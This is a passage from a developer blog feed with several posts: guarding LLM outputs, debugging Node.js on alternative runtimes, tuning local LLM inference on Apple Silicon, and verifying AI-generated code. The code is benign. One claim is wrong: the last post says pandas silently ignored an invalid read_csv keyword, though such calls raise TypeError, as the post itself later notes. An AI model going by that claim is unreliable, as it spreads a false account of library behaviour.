</ul>
<p>Yes, you're paying for an extra call. In our case cost roughly doubled per request, and that was fine — the alternative was customer-visible mistakes.</p>
<h2 id="heading-step-3-deterministic-guards-on-the-things-you-can-actually-check">Step 3: Deterministic guards on the things you can actually check</h2>
<p>LLMs don't need to be involved in checking facts that have a definite answer. If your output mentions an order ID, regex-check the format and look it up in your database. Numbers, dates, IDs, enum values, email addresses — all deterministic.</p>
<p>I added a small guard layer that runs after the verifier:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> re

ORDER_ID = re.compile(<span class="hljs-string">r"^ORD-\d{8}$"</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">guard</span>(<span class="hljs-params">output, ticket</span>) -&gt; bool:</span>
    <span class="hljs-keyword">for</span> oid <span class="hljs-keyword">in</span> output.mentioned_order_ids:
        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> ORDER_ID.match(oid):
            <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>  <span class="hljs-comment"># malformed ID</span>
        <span class="hljs-keyword">if</span> oid <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> ticket.body:
            <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>  <span class="hljs-comment"># model invented an order ID</span>
        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> db.orders.exists(oid):
            <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>  <span class="hljs-comment"># ID doesn't resolve</span>
    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre>
<p>If any deterministic check fails, we don't show the response at all. Fall back to a templated message: "we received your ticket, an agent will respond shortly." Boring, correct, never wrong.</p>
<h2 id="heading-step-4-log-the-disagreements">Step 4: Log the disagreements</h2>
<p>For every request, log the generator output, the verifier verdict, and the guard outcome. Then build a dashboard of disagreements. Within a week you'll see patterns — specific input shapes that trigger more verifier failures, specific claim types that get confabulated.</p>
<p>This is where you get the data to improve your prompt, swap models, or fine-tune. Without it you're guessing.</p>
<h2 id="heading-prevention-tips-for-next-time">Prevention tips for next time</h2>
<p>A few things I'd do from day one on the next project:</p>
<ul>
<li><strong>Decide on output structure before you write the prompt.</strong> Pick the schema first, then write a prompt that produces it. Don't bolt structure on later.</li>
<li><strong>Build evals from production logs, not synthetic examples.</strong> Synthetic examples test what you imagined. Logs test what users actually do.</li>
<li><strong>Treat the model as one component, not the whole system.</strong> Validators, guards, retrieval, deterministic checks — these aren't workarounds, they're the architecture. A good LLM feature is mostly not the LLM.</li>
<li><strong>Keep a templated fallback for every code path.</strong> When the model is uncertain, users should get a boring correct response — not a creative wrong one.</li>
<li><strong>Sample and review.</strong> Set up a review queue, look at 50 outputs a week, write down what you find. There's no substitute.</li>
</ul>
<h2 id="heading-the-bigger-lesson">The bigger lesson</h2>
<p>The thing I keep coming back to is that fluency is not correctness. A model that produces beautiful, well-structured, confident text saying the wrong thing is in some sense more dangerous than one that produces obvious garbage. Garbage gets caught. Confident wrongness gets shipped.</p>
<p>Build the verifier. Add the guards. Log everything. Then sleep slightly better.</p>
]]></content:encoded></item><item><title><![CDATA[Debugging the 0.2%: When Node.js Code Fails on Alternative Runtimes]]></title><description><![CDATA[You ever migrate a Node.js service to an alternative JavaScript runtime, watch most of your tests pass, then spend an entire afternoon hunting down the handful that fail? I have. Three times this year.
Here's the thing about runtime compatibility num...]]></description><link>https://alan-west.hashnode.dev/debugging-the-02-when-nodejs-code-fails-on-alternative-runtimes</link><guid isPermaLink="true">https://alan-west.hashnode.dev/debugging-the-02-when-nodejs-code-fails-on-alternative-runtimes</guid><category><![CDATA[debugging]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[node]]></category><category><![CDATA[webdev]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 10 May 2026 16:37:54 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483871/pexels-photo-17483871.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>You ever migrate a Node.js service to an alternative JavaScript runtime, watch most of your tests pass, then spend an entire afternoon hunting down the handful that fail? I have. Three times this year.</p>
<p>Here's the thing about runtime compatibility numbers — they sound great in headlines. "99.8% Node.js compatibility" is a real flex. But when you're the dev whose login flow lives in the 0.2%, that number suddenly feels useless.</p>
<p>This post walks through how I debug compatibility failures when running existing Node code on alternative runtimes. The approach is the same regardless of which runtime you're targeting.</p>
<h2 id="heading-the-problem">The Problem</h2>
<p>You've got an existing Node.js codebase. It works fine on Node 20. You decide to try a faster runtime — maybe for cold start improvements, maybe just to benchmark. You install it, point it at your entry file, and...</p>
<pre><code class="lang-bash">$ alt-runtime run server.js
TypeError: process.binding is not a <span class="hljs-keyword">function</span>
    at requireBuiltin (internal/util.js:42:18)
    at Module._compile (...)
</code></pre>
<p>Or worse — it starts. Tests pass. Production breaks two days later because some edge case in <code>crypto.createHash</code> returns a slightly different object shape.</p>
<p>These failures look random. They aren't. They cluster around a few predictable categories.</p>
<h2 id="heading-root-cause-where-compatibility-actually-breaks">Root Cause: Where Compatibility Actually Breaks</h2>
<p>Most "Node-compatible" runtimes implement the public <code>node:*</code> API surface. The trouble is that "Node compatible" is a fuzzy claim, and the gaps usually fall into four buckets:</p>
<h3 id="heading-1-internal-apis">1. Internal APIs</h3>
<p>Stuff like <code>process.binding</code>, <code>internalBinding</code>, or anything from <code>node:internal/*</code>. These are explicitly private, but plenty of npm packages rely on them. If a package was last updated in 2017, there's a decent chance it's reaching into Node internals you didn't know about.</p>
<h3 id="heading-2-behavioral-differences-in-public-apis">2. Behavioral differences in public APIs</h3>
<p>The function signature matches Node. The return type matches. But the behavior is subtly different — different error codes, different event ordering, different timing for <code>setImmediate</code> vs <code>process.nextTick</code>.</p>
<h3 id="heading-3-missing-modules">3. Missing modules</h3>
<p>Whole modules sometimes aren't implemented. <code>node:vm</code>, <code>node:cluster</code>, and <code>node:worker_threads</code> are the usual suspects, depending on the runtime.</p>
<h3 id="heading-4-native-addons">4. Native addons</h3>
<p>If your dependency tree pulls in anything that compiles a <code>.node</code> file, alternative runtimes often can't load it without a workaround. N-API support varies in maturity.</p>
<h2 id="heading-step-by-step-debugging">Step-by-Step Debugging</h2>
<p>Here's the workflow I run through every time. It usually finds the issue in 15-30 minutes.</p>
<h3 id="heading-step-1-get-a-clean-reproduction">Step 1: Get a clean reproduction</h3>
<p>Don't debug inside your full app. Strip it down. I keep a <code>repro/</code> directory in every project for exactly this:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// repro/test-crypto.js</span>
<span class="hljs-comment">// Minimal repro for the hash mismatch I saw in auth.js</span>
<span class="hljs-keyword">const</span> crypto = <span class="hljs-built_in">require</span>(<span class="hljs-string">'node:crypto'</span>);

<span class="hljs-keyword">const</span> h1 = crypto.createHash(<span class="hljs-string">'sha256'</span>);
h1.update(<span class="hljs-string">'test'</span>);
<span class="hljs-built_in">console</span>.log(<span class="hljs-string">'first digest:'</span>, h1.digest(<span class="hljs-string">'hex'</span>));
<span class="hljs-comment">// Calling digest() twice — does this throw or return empty?</span>
<span class="hljs-built_in">console</span>.log(<span class="hljs-string">'second digest:'</span>, h1.digest(<span class="hljs-string">'hex'</span>));
</code></pre>
<p>Run the same file under Node and the alternative runtime. If the output differs, you've localized the failure.</p>
<h3 id="heading-step-2-find-which-api-is-implicated">Step 2: Find which API is implicated</h3>
<p>When the stack trace is unhelpful, instrument the suspect module. I use a tiny tracing Proxy:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// trace.js — wraps a module and logs every call shape</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">trace</span>(<span class="hljs-params">mod, name</span>) </span>{
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Proxy</span>(mod, {
    get(target, prop) {
      <span class="hljs-keyword">const</span> value = target[prop];
      <span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span> value !== <span class="hljs-string">'function'</span>) <span class="hljs-keyword">return</span> value;
      <span class="hljs-keyword">return</span> <span class="hljs-function">(<span class="hljs-params">...args</span>) =&gt;</span> {
        <span class="hljs-comment">// Log call shape so I can diff runtimes side-by-side</span>
        <span class="hljs-built_in">console</span>.error(<span class="hljs-string">`[<span class="hljs-subst">${name}</span>.<span class="hljs-subst">${<span class="hljs-built_in">String</span>(prop)}</span>]`</span>, args.map(<span class="hljs-function"><span class="hljs-params">a</span> =&gt;</span> <span class="hljs-keyword">typeof</span> a));
        <span class="hljs-keyword">return</span> value.apply(target, args);
      };
    }
  });
}

<span class="hljs-keyword">const</span> fs = trace(<span class="hljs-built_in">require</span>(<span class="hljs-string">'node:fs'</span>), <span class="hljs-string">'fs'</span>);
<span class="hljs-comment">// now use `fs` as normal — every call gets logged with arg types</span>
</code></pre>
<p>Run this on both runtimes and diff the output. The first diverging line is almost always your culprit.</p>
<h3 id="heading-step-3-check-the-runtimes-compatibility-tracker">Step 3: Check the runtime's compatibility tracker</h3>
<p>Every serious alternative runtime publishes a known-incompatibilities list. Find it in their official docs before you start writing workarounds — odds are someone already filed your issue and there's a documented workaround.</p>
<p>A quick search of the runtime's GitHub issues with <code>is:issue node compat &lt;module-name&gt;</code> is also worth thirty seconds.</p>
<h3 id="heading-step-4-apply-the-right-kind-of-fix">Step 4: Apply the right kind of fix</h3>
<p>Once you know what's broken, the fix usually falls into one of three patterns:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Pattern A: feature-detect and branch</span>
<span class="hljs-keyword">const</span> hasFeature = <span class="hljs-keyword">typeof</span> process.someAPI === <span class="hljs-string">'function'</span>;
<span class="hljs-keyword">const</span> result = hasFeature
  ? process.someAPI(input)
  : fallbackImplementation(input); <span class="hljs-comment">// pure-JS fallback</span>

<span class="hljs-comment">// Pattern B: pin a userland polyfill instead of the runtime built-in</span>
<span class="hljs-comment">// e.g. use a pure-JS hashing lib for one specific call site</span>
<span class="hljs-comment">//      where the native crypto behavior diverges</span>

<span class="hljs-comment">// Pattern C: isolate the bad path behind a runtime check</span>
<span class="hljs-keyword">const</span> runtime =
  <span class="hljs-keyword">typeof</span> globalThis.Bun !== <span class="hljs-string">'undefined'</span> ? <span class="hljs-string">'bun'</span> :
  <span class="hljs-keyword">typeof</span> globalThis.Deno !== <span class="hljs-string">'undefined'</span> ? <span class="hljs-string">'deno'</span> :
  <span class="hljs-string">'node'</span>;

<span class="hljs-built_in">module</span>.exports = runtime === <span class="hljs-string">'node'</span>
  ? <span class="hljs-built_in">require</span>(<span class="hljs-string">'./node-impl'</span>)
  : <span class="hljs-built_in">require</span>(<span class="hljs-string">'./portable-impl'</span>);
</code></pre>
<p>Pattern A is the cleanest. Pattern C is the ugliest, but sometimes you have no choice — especially with native addons.</p>
<h2 id="heading-prevention-stop-hitting-these-in-the-first-place">Prevention: Stop Hitting These in the First Place</h2>
<p>A few habits that have saved me real time:</p>
<ul>
<li><strong>Run your full test suite on the alt runtime in CI from day one.</strong> Not just unit tests — the integration tests that exercise weird APIs. A green build today doesn't mean green tomorrow when you bump a dep.</li>
<li><strong>Audit your dependency tree for native addons.</strong> <code>npm ls --all</code> or look for <code>binding.gyp</code> files in <code>node_modules</code>. Native addons are where most of my migration pain comes from.</li>
<li><strong>Avoid undocumented Node APIs in your own code.</strong> If it's not in the official Node API docs, it's not portable. <code>process.binding</code>, <code>_extend</code>, anything starting with an underscore — pretend they don't exist.</li>
<li><strong>Watch the runtime's release notes for "Node compat" entries.</strong> Every release usually moves the line. Knowing what just got fixed saves you from working around something that no longer needs working around.</li>
</ul>
<h2 id="heading-the-honest-take">The Honest Take</h2>
<p>The 99.8% number isn't lying. It's just that "passing the test suite" and "running my specific production workload" are different problems. Test suites cover documented APIs and well-trodden paths. Your production code does whatever your dependencies decided to do five years ago.</p>
<p>The good news: if you adopt the debugging workflow above, the 0.2% becomes tractable. Most of the failures I've hit have a 30-minute fix once I stop guessing and start tracing.</p>
<p>Pick a runtime, run your tests, and when something breaks — don't panic, instrument it.</p>
]]></content:encoded></item><item><title><![CDATA[Why local LLM inference stalls on Apple Silicon (and how to fix it)]]></title><description><![CDATA[I spent a chunk of last month trying to run a 30B-class model locally on my M2 Max. 64GB of unified memory, a stack of GPU cores, no other apps running. Should be smooth. Instead I got around 3 tokens per second, a fan that sounded like a leaf blower...]]></description><link>https://alan-west.hashnode.dev/why-local-llm-inference-stalls-on-apple-silicon-and-how-to-fix-it</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-local-llm-inference-stalls-on-apple-silicon-and-how-to-fix-it</guid><category><![CDATA[llm]]></category><category><![CDATA[MachineLearning]]></category><category><![CDATA[Metal]]></category><category><![CDATA[performance]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 10 May 2026 16:31:34 GMT</pubDate><enclosure url="https://images.pexels.com/photos/2105927/pexels-photo-2105927.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>I spent a chunk of last month trying to run a 30B-class model locally on my M2 Max. 64GB of unified memory, a stack of GPU cores, no other apps running. Should be smooth. Instead I got around 3 tokens per second, a fan that sounded like a leaf blower, and the slow creeping suspicion that I was holding it wrong.</p>
<p>If you've tried serious local inference on Apple Silicon, you've probably hit this. The hardware is genuinely capable. The software stack often isn't — or rather, the <em>generic</em> software stack isn't. This came back into focus for me when antirez (yes, the Redis guy) posted <a target="_blank" href="https://github.com/antirez/ds4">ds4</a>, a from-scratch Metal inference engine targeting DeepSeek. The README is pretty explicit that it's a focused, learning-oriented project rather than a general framework, but seeing it made me want to write up <em>why</em> the focused approach keeps winning on Apple Silicon, and what you can do about slow local inference today.</p>
<h2 id="heading-the-root-cause-its-bandwidth-not-flops">The root cause: it's bandwidth, not FLOPS</h2>
<p>Here's the thing nobody tells you when you start: during token-by-token decoding, an LLM is almost entirely memory-bandwidth-bound, not compute-bound. Every generated token requires streaming the full set of weights (or at least every weight touched by that forward pass) from memory through the GPU, plus reading and writing the KV cache.</p>
<p>A quick napkin calculation. Say you have a 7B parameter model in 4-bit quantization. That's roughly 4GB of weights. To generate one token, you read all 4GB once. If your effective memory bandwidth to the GPU is around 200 GB/s (well under the theoretical peak on M-series Max chips, but realistic for many workloads), the <em>floor</em> on per-token latency is:</p>
<pre><code><span class="hljs-number">4</span> GB / <span class="hljs-number">200</span> GB/s = <span class="hljs-number">20</span> ms =&gt; ~<span class="hljs-number">50</span> tokens/sec ceiling
</code></pre><p>If you're getting 3 tokens/sec, you're not bandwidth-limited. You're losing somewhere in the stack. The questions are: <em>where</em>, and <em>why</em>.</p>
<h2 id="heading-where-time-actually-goes">Where time actually goes</h2>
<p>When I profiled my run with Instruments and the Metal System Trace template, three things jumped out:</p>
<ol>
<li><strong>Tons of tiny kernel launches.</strong> Each transformer layer was firing off many small Metal compute encoders — softmax, RMSNorm, rotary embeddings, masks — and the GPU spent more time in dispatch overhead than in actual math.</li>
<li><strong>Quantization on the wrong side of the bus.</strong> Some kernels were dequantizing weights into FP16, writing the FP16 back to memory, <em>then</em> doing the matmul. That literally destroys the point of quantization, which is to shrink the bytes you stream.</li>
<li><strong>KV cache being copied around.</strong> The cache was being reallocated on every step in some paths instead of being grown in place.</li>
</ol>
<p>Generic frameworks make these mistakes because they're trying to be everything to everyone. A focused inference engine for one model family can hardcode the right answers.</p>
<h2 id="heading-step-1-fuse-your-kernels">Step 1: fuse your kernels</h2>
<p>The single biggest win is fusing the small operations in each transformer block into one or two big kernels. Here's the pattern I converged on, in pseudocode:</p>
<pre><code class="lang-metal">// Fused: RMSNorm -&gt; Q/K/V projection -&gt; RoPE
// Avoids three separate dispatches and two round trips through memory.
kernel void attn_qkv_rope(
    device const half*  x        [[buffer(0)]],  // input activations
    device const uint8_t* w_qkv  [[buffer(1)]],  // 4-bit packed weights
    device const half*  scales   [[buffer(2)]],  // per-group scales
    device half*        q_out    [[buffer(3)]],
    device half*        k_out    [[buffer(4)]],
    device half*        v_out    [[buffer(5)]],
    constant Params&amp;    p        [[buffer(6)]],
    uint tid [[thread_position_in_grid]]) {
    // 1) RMSNorm in-register, no temp buffer back to global mem
    float norm = rms_norm_inline(x, tid, p);

    // 2) Dequant + GEMV in the same pass: each weight tile is
    //    unpacked into registers and immediately consumed.
    half3 qkv = dequant_gemv_q4(w_qkv, scales, norm, tid, p);

    // 3) Apply rotary embeddings before the write-out.
    apply_rope(qkv, tid, p);

    write_split(q_out, k_out, v_out, qkv, tid);
}
</code></pre>
<p>Key idea: weights stay packed in 4-bit form in memory. They're unpacked into <em>registers</em> inside the kernel and consumed immediately. You never write a dequantized copy back to global memory. The matmul reads the small representation; the math happens on the wider one inside SIMD units.</p>
<p>That single change took my throughput on a small 7B model from "painful" to "actually usable." Your numbers will vary — but the principle holds for any chip with a memory wall.</p>
<h2 id="heading-step-2-stop-reallocating-the-kv-cache">Step 2: stop reallocating the KV cache</h2>
<p>This one bit me hard. A naive implementation grows the KV tensor by allocating a bigger buffer each step and copying. On Metal that means a <code>MTLBlitCommandEncoder</code> round trip for every token. Don't do this.</p>
<p>Preallocate once, write in place:</p>
<pre><code class="lang-c"><span class="hljs-comment">// Preallocate KV for max_seq_len at startup.</span>
<span class="hljs-comment">// Writes are O(1) per token; no resize, no copy.</span>
<span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span>
    half* k;            <span class="hljs-comment">// [n_layers][max_seq][n_kv_heads][head_dim]</span>
    half* v;
    <span class="hljs-keyword">int</span>   capacity;     <span class="hljs-comment">// max_seq_len</span>
    <span class="hljs-keyword">int</span>   length;       <span class="hljs-comment">// current logical length</span>
} <span class="hljs-keyword">kv_cache_t</span>;

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">kv_append</span><span class="hljs-params">(<span class="hljs-keyword">kv_cache_t</span>* c,
                             <span class="hljs-keyword">const</span> half* k_new,
                             <span class="hljs-keyword">const</span> half* v_new,
                             <span class="hljs-keyword">int</span> layer, <span class="hljs-keyword">int</span> n_kv, <span class="hljs-keyword">int</span> head_dim)</span> </span>{
    <span class="hljs-comment">// Just write to the next slot; no allocation.</span>
    <span class="hljs-keyword">size_t</span> off = ((<span class="hljs-keyword">size_t</span>)layer * c-&gt;capacity + c-&gt;length) * n_kv * head_dim;
    <span class="hljs-built_in">memcpy</span>(c-&gt;k + off, k_new, n_kv * head_dim * <span class="hljs-keyword">sizeof</span>(half));
    <span class="hljs-built_in">memcpy</span>(c-&gt;v + off, v_new, n_kv * head_dim * <span class="hljs-keyword">sizeof</span>(half));
}
</code></pre>
<p>If you want to support eviction or sliding windows later, add it as a logical layer on top. Keep the hot path branch-free.</p>
<h2 id="heading-step-3-pick-the-right-quantization-for-your-hardware">Step 3: pick the right quantization for your hardware</h2>
<p>Not all 4-bit schemes are equal on Metal. Group-wise quantization with a small group size (32 or 64) usually unpacks cleanly in SIMD lanes and plays nicely with the threadgroup memory you have. Block-wise schemes with larger groups save more on the scale-table side but can stall on misaligned reads.</p>
<p>My rough rule of thumb after migrating a few projects:</p>
<ul>
<li><strong>Q4 with group size 32</strong>: best balance for M-series; fast unpack, good quality.</li>
<li><strong>Q5/Q6</strong>: noticeable quality bump, but you're trading away bandwidth — only worth it if you're already CPU-bound on dispatch.</li>
<li><strong>Q8</strong>: simple, accurate, but uses 2x the bandwidth of Q4 for marginal quality. Use it for debugging quantization bugs, not production.</li>
</ul>
<p>This is the kind of tradeoff a focused engine bakes in; a generic one usually exposes all of them and lets you pick the wrong one.</p>
<h2 id="heading-prevention-profile-before-you-optimize">Prevention: profile before you optimize</h2>
<p>Before you touch a single kernel, open Instruments with <strong>Metal System Trace</strong> and look at the timeline. You're looking for:</p>
<ul>
<li>Long gaps between command buffer commits (CPU bottleneck — your encoding loop is too chatty).</li>
<li>Many tiny encoders inside one buffer (kernel fusion opportunity).</li>
<li>High occupancy but low achieved bandwidth (unaligned reads or scalar paths in your kernels).</li>
<li>Memory traffic that exceeds your model size per token (you're materializing dequantized weights — fix that first).</li>
</ul>
<p>Apple's <a target="_blank" href="https://developer.apple.com/documentation/metal/">Metal Performance HUD</a> and the official <a target="_blank" href="https://developer.apple.com/metal/Metal-Shading-Language-Specification.pdf">Metal Shading Language spec</a> are your friends here. So is reading focused, single-model engines like ds4 — they tend to make the design choices explicit instead of hiding them behind abstraction.</p>
<h2 id="heading-the-takeaway">The takeaway</h2>
<p>Local inference on Apple Silicon isn't slow because the hardware is bad. It's slow when generic frameworks impose generic abstractions on a workload that punishes them. Fuse your kernels, keep weights packed, preallocate your KV cache, pick a quantization that maps well to SIMD, and profile before you guess. You'll get most of the way to what a hand-tuned engine achieves — and you'll understand your stack a lot better when something inevitably regresses.</p>
]]></content:encoded></item><item><title><![CDATA[Why AI-Generated Code Makes You Slower (And How to Fix Your Workflow)]]></title><description><![CDATA[You've probably felt this. The first week you wired an AI assistant into your editor, you shipped twice as much. By month three, you were back to your old pace — except now you were debugging weirder bugs.
I've been using AI assistants in my daily wo...]]></description><link>https://alan-west.hashnode.dev/why-ai-generated-code-makes-you-slower-and-how-to-fix-your-workflow</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-ai-generated-code-makes-you-slower-and-how-to-fix-your-workflow</guid><category><![CDATA[AI]]></category><category><![CDATA[Productivity]]></category><category><![CDATA[Python]]></category><category><![CDATA[Testing]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Sun, 10 May 2026 16:25:10 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483874/pexels-photo-17483874.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>You've probably felt this. The first week you wired an AI assistant into your editor, you shipped twice as much. By month three, you were back to your old pace — except now you were debugging weirder bugs.</p>
<p>I've been using AI assistants in my daily workflow for about two years across four projects. The pattern keeps showing up: the productivity gains are real but front-loaded, and they erode unless you change how you work. Most of that erosion comes from one specific, fixable problem.</p>
<h2 id="heading-the-problem-plausible-code-that-doesnt-actually-work">The Problem: Plausible Code That Doesn't Actually Work</h2>
<p>The bug I see most often isn't an obvious syntax error. It's when generated code calls a function, method, or config option that <em>looks</em> exactly like something the library would have — but doesn't.</p>
<p>Last month I was building a CSV import feature and the assistant happily produced this:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> pandas <span class="hljs-keyword">as</span> pd

<span class="hljs-comment"># Read CSV with progress reporting — looks reasonable, right?</span>
df = pd.read_csv(
    <span class="hljs-string">"users.csv"</span>,
    on_progress=<span class="hljs-keyword">lambda</span> pct: print(<span class="hljs-string">f"Loading: <span class="hljs-subst">{pct}</span>%"</span>),  <span class="hljs-comment"># this kwarg does not exist</span>
    chunksize=<span class="hljs-number">10</span>_000,
)
</code></pre>
<p><code>on_progress</code> is not a real parameter on <code>pd.read_csv</code>. The code was syntactically valid Python, my linter didn't complain, and the failure mode was... silent. The kwarg got swallowed and the import ran without any progress reporting. I only noticed because a user pinged me saying the loading bar wasn't moving.</p>
<p>This is the core issue. AI-generated code is <em>plausible</em> in a specific, dangerous way: it pattern-matches the shape of real APIs, which is exactly what makes it hard to spot in review.</p>
<h2 id="heading-root-cause-how-hallucinations-slip-through">Root Cause: How Hallucinations Slip Through</h2>
<p>Three things conspire here:</p>
<ul>
<li><strong>Pattern-matching beats correctness.</strong> The model has seen thousands of <code>pd.read_csv</code> calls. It has also seen progress callbacks on other I/O functions. Stitching them together produces code that <em>looks</em> right without being right.</li>
<li><strong>Type checkers often can't save you.</strong> Many libraries use <code>**kwargs</code>, dynamic dispatch, or duck typing. Static analysis won't flag a non-existent keyword argument that flows through <code>**kwargs</code>.</li>
<li><strong>Reviewer fatigue.</strong> When the surrounding code is correct and the function name is real, your eyes glide over the made-up parameter. After 200 lines of mostly-good output, you stop reading carefully.</li>
</ul>
<p>The deeper issue is a workflow one. If you're prompting for a feature and pasting the result, you've outsourced <em>generation</em> but kept full responsibility for <em>verification</em> — and verification is harder on code you didn't write, because you don't have the mental model the author would have.</p>
<h2 id="heading-the-fix-force-verification-into-the-loop">The Fix: Force Verification Into the Loop</h2>
<p>Here's the workflow I switched to after enough of these bites. The core idea: don't accept code unless something other than your eyes has touched it.</p>
<h3 id="heading-step-1-generate-the-test-first">Step 1: Generate the test first</h3>
<p>Before generating the implementation, write (or generate) a test that exercises the specific behavior you want. This pins the behavior to something runnable.</p>
<pre><code class="lang-python"><span class="hljs-comment"># tests/test_import.py</span>
<span class="hljs-keyword">from</span> myapp.importer <span class="hljs-keyword">import</span> load_users

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">test_load_users_reports_progress</span>():</span>
    progress_log = []

    <span class="hljs-comment"># The whole point of the feature: progress callbacks fire</span>
    result = load_users(
        <span class="hljs-string">"tests/fixtures/users.csv"</span>,
        on_progress=<span class="hljs-keyword">lambda</span> pct: progress_log.append(pct),
    )

    <span class="hljs-keyword">assert</span> len(result) &gt; <span class="hljs-number">0</span>
    <span class="hljs-keyword">assert</span> progress_log, <span class="hljs-string">"expected at least one progress update"</span>
    <span class="hljs-keyword">assert</span> progress_log[<span class="hljs-number">-1</span>] == <span class="hljs-number">100</span>
</code></pre>
<p>If the implementation hallucinates an API, the test fails immediately with a real error message — usually <code>TypeError: unexpected keyword argument</code>. Way cheaper than debugging in production.</p>
<h3 id="heading-step-2-run-code-dont-just-read-it">Step 2: Run code, don't just read it</h3>
<p>Add a pre-commit hook that blocks commits when tests fail. Yes, this is obvious. Yes, most teams I've worked with don't actually enforce it.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># .pre-commit-config.yaml</span>
<span class="hljs-attr">repos:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">repo:</span> <span class="hljs-string">local</span>
    <span class="hljs-attr">hooks:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">id:</span> <span class="hljs-string">pytest-fast</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">pytest</span> <span class="hljs-string">(fast</span> <span class="hljs-string">suite)</span>
        <span class="hljs-attr">entry:</span> <span class="hljs-string">pytest</span> <span class="hljs-string">-x</span> <span class="hljs-string">-m</span> <span class="hljs-string">"not slow"</span>  <span class="hljs-comment"># -x: stop on first failure</span>
        <span class="hljs-attr">language:</span> <span class="hljs-string">system</span>
        <span class="hljs-attr">pass_filenames:</span> <span class="hljs-literal">false</span>
        <span class="hljs-attr">always_run:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>The point isn't catching every bug. It's catching the <em>plausible-but-wrong</em> ones the moment they hit your branch, before they pile up into a multi-hour debugging session two weeks later.</p>
<h3 id="heading-step-3-pin-the-dependency-surface">Step 3: Pin the dependency surface</h3>
<p>A surprising amount of hallucination happens because the model assumes a different version of a library than you have installed. Lock your versions and tell the assistant which version you're on:</p>
<pre><code class="lang-toml"><span class="hljs-comment"># pyproject.toml</span>
<span class="hljs-section">[project]</span>
<span class="hljs-attr">dependencies</span> = [
    <span class="hljs-string">"pandas==2.2.3"</span>,    <span class="hljs-comment"># exact pin, not &gt;=</span>
    <span class="hljs-string">"pydantic==2.9.2"</span>,
]
</code></pre>
<p>When you prompt, include the version. "Using pandas 2.2.3, write a CSV importer with progress reporting" gets you closer to reality than the same prompt without the version, because the model will at least try to constrain its API recall.</p>
<h3 id="heading-step-4-prefer-narrow-prompts-over-broad-ones">Step 4: Prefer narrow prompts over broad ones</h3>
<p>Long, multi-feature prompts produce code where errors compound. I get better results asking for one function at a time, with clear inputs and outputs:</p>
<pre><code class="lang-text">Function signature:
    def parse_user_row(row: dict) -&gt; User: ...

Requirements:
- Strip whitespace from email
- Reject rows where email is missing or invalid
- Return User(email=..., name=..., created_at=...)
- Raise InvalidRowError on bad data, do not log

Use only the standard library and pydantic 2.9.
</code></pre>
<p>Narrow scope, explicit constraints, named version. My hallucination rate drops noticeably with this format.</p>
<h2 id="heading-prevention-build-habits-not-heroics">Prevention: Build Habits, Not Heroics</h2>
<p>A few things I now do reflexively:</p>
<ul>
<li><strong>Read the imports first.</strong> If the generated code imports something you didn't ask for, that's a yellow flag. Verify the import path exists in your installed version before reading further.</li>
<li><strong>Distrust convenience parameters.</strong> When a function call has a kwarg that feels suspiciously <em>just right</em> for your problem, look it up in the docs. That's the highest-probability hallucination spot.</li>
<li><strong>Treat "looks correct" as a smell.</strong> If you read 30 lines of generated code and have zero questions, you didn't read carefully. There should always be at least one thing to verify.</li>
<li><strong>Keep your test runtime fast.</strong> If your full suite takes eight minutes, you'll skip running it. Sub-30-second feedback loops are what actually keep this workflow honest.</li>
</ul>
<h2 id="heading-so-more-work-or-less">So, More Work or Less?</h2>
<p>After two years, my honest answer is: roughly the same amount of work, but distributed differently. Less typing, more reading. Less greenfield design, more verification. The people I see <em>losing</em> time to AI tools are the ones who didn't shift the verification load anywhere — they just trusted the output and inherited a slower debugging tail.</p>
<p>The tooling won't fix this for you. The workflow will.</p>
